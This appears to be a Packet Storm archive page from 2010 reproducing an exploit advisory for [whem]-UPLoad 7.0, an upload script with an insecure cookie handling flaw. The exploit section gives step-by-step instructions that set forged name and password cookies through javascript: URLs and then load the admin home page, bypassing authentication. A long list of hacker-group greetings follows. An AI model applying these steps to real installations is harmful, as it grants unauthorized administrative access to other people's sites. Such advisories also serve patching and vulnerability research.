what you don't know can hurt you

[whem]-UPLoad 7.0 Insecure Cookie

[whem]-UPLoad 7.0 Insecure Cookie
Posted Jun 23, 2010
Authored by indoushka

[whem]-UPLoad version 7.0 suffers from an insecure cookie handling vulnerability.

tags | exploit, insecure cookie handling
MD5 | f1239aae7cccf96f99ee114041086a4c

[whem]-UPLoad 7.0 Insecure Cookie

Change Mirror Download
========================================================================================         
| # Title : [whem]-UPLoad - v 7.0 Mullti Vulnerability
| # Author : indoushka
| # email : indoushka@dgsn.dz
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # Web Site : http://wh-em.com/
| # Script : Powered by UPLoad - v 7.0 or UPLoad - v 7.0 only
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : Insecure Cookie Handling Vulnerability
====================== Exploit By indoushka =================================
# Exploit :

1- http://127.0.0.1/upload/upload/admin/

2- javascript:document.cookie="whem_Name=adm_user;path=/";

3- javascript:document.cookie="whem_Password=adm_user;path=/";

4- http://127.0.0.1/upload/upload/admin/home.php

tested in IE6 + Opera V.10.10

================================ Dz-Ghost Team ======================================================
Greetz : ÔßÑÇ áÓßÇä æáÇíÉ ÓíÏí ÈáÚÈÇÓ 22 + äÇÓ ãÚÓßÑ + äÇÓ ÊíÇÑÊ + äÇÓ ÇáÌáÝÉ + äÇÓ ÇáãÓíáÉ
+ äÇÓ ÊáãÓÇä + äÇÓ äÏÑæãÉ +äÇÓ ãÛäíÉ + äÇÓ æÌÏÉ +äÇÓ ÃÛÇÏíÑ + äÇÓ ÝÇÓ æãßäÇÓ + äÇÓ æåÑÇä

Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
----------------------------------------------------------------------------------------------------------

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

 • Su
 • Mo
 • Tu
 • We
 • Th
 • Fr
 • Sa
 • 1
  Jun 1st
  1 Files
 • 2
  Jun 2nd
  2 Files
 • 3
  Jun 3rd
  19 Files
 • 4
  Jun 4th
  21 Files
 • 5
  Jun 5th
  15 Files
 • 6
  Jun 6th
  12 Files
 • 7
  Jun 7th
  11 Files
 • 8
  Jun 8th
  1 Files
 • 9
  Jun 9th
  1 Files
 • 10
  Jun 10th
  15 Files
 • 11
  Jun 11th
  15 Files
 • 12
  Jun 12th
  15 Files
 • 13
  Jun 13th
  8 Files
 • 14
  Jun 14th
  16 Files
 • 15
  Jun 15th
  2 Files
 • 16
  Jun 16th
  1 Files
 • 17
  Jun 17th
  18 Files
 • 18
  Jun 18th
  15 Files
 • 19
  Jun 19th
  22 Files
 • 20
  Jun 20th
  14 Files
 • 21
  Jun 21st
  0 Files
 • 22
  Jun 22nd
  0 Files
 • 23
  Jun 23rd
  0 Files
 • 24
  Jun 24th
  0 Files
 • 25
  Jun 25th
  0 Files
 • 26
  Jun 26th
  0 Files
 • 27
  Jun 27th
  0 Files
 • 28
  Jun 28th
  0 Files
 • 29
  Jun 29th
  0 Files
 • 30
  Jun 30th
  0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close